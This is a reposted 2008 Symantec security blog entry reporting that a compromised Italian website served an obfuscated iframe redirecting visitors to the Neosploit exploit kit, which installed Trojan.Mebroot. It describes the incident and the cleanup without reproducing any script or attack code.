Thursday, April 03, 2008 10:46 AM
cmosby
Symantec Security Response Weblog: Mebroot Spreading through High-Traffic, Compromised Web Sites
Mebroot Spreading through High-Traffic, Compromised Web Sites
Symantec is tracking more and more high-traffic Web sites that become compromised and then used to spread malicious code. After the breach our MSS team spotted out on Tata, we have been notified of another Web site with a similar issue.
Today the Italian Web site www.emule-italia.it had been compromised and was hosting an obfuscated script:
The script, when deobfuscated, was showing an iframe pointing to http://[REMOVED]xes.com/ld/grb, which was redirecting users to a server (http://[REMOVED]fir.com/cgi-bin/mail.cgi?p=grobin) hosting the Neosploit tool. Neosploit is forcing vulnerable PCs to download and install the latest version of the infamous Trojan.Mebroot.
Symantec notified the ISP involved about this issue and the ISP has since worked to remove the malicious content from the affected Web site. High-traffic Web sites are becoming more and more targeted, because the huge number of visits they receive turns into a huge number of machines getting compromised in a short period of time. Therefore, application security is even more important for these sites: periodic penetration testing, code review, and sound application security practices (please see http://www.symantec.com/business/solutions/whitepapers.jsp?solid=security) in the overall development lifecycle can protect site owners from these kind of threats.
A very special thanks to Mr. Marco Cazzaniga for this heads up and for providing his continuous support to our team.
Posted by Andrea Del Miglio on April 2, 2008 12:00 PM
Source: Symantec Security Response Weblog: Mebroot Spreading through High-Traffic, Compromised Web Sites
Filed under: Internet Hacks, Security, Cybercrime, Software Vulnerabilites